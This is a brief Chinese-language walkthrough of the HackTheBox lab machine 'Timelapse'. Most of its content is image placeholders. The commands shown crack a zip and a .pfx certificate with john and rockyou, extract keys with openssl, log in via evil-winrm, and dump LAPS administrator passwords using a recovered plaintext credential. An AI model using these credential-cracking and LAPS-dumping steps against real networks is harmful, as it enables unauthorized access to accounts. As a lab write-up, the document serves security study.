Timelapse - HackTheBox
Td

image

nmap扫描

image

image

先看88端口

image

389端口

image

445端口

image

image

发现一个压缩文件,下载下来

image

爆破一下密码

zip2john winrm_backup.zip >> hash

image

image

.pfx文件是类似于一个linux中的ssh密钥文件,将其进行解密

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out test.key

用压缩包的密码不对

在爆破一下

pfx2john legacyy_dev_auth.pfx > pfx

john --wordlist=/usr/share/wordlists/rockyou.txt pfx

image

执行后得到一个密钥文件

image

但还需要一个

openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert

image

利用evil-winrm进行连接

evil-winrm -i 10.10.11.152 -S -c cert -k test.key -p -u

image

提权

image

上传检测脚本

image

发现一个控制台历史文件

image

得到了一个svc_deploy的用户密码

image

该用户处于LAPS_Readers用户组

https://www.sentinelone.com/blog/laps-vulnerability-assessment/

image

LAPS存储有明文密码

尝试对其进行获取

https://github.com/n00py/LAPSDumper/blob/main/laps.py

python laps.py -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -d timelapse.htb

image

尝试登录

image

image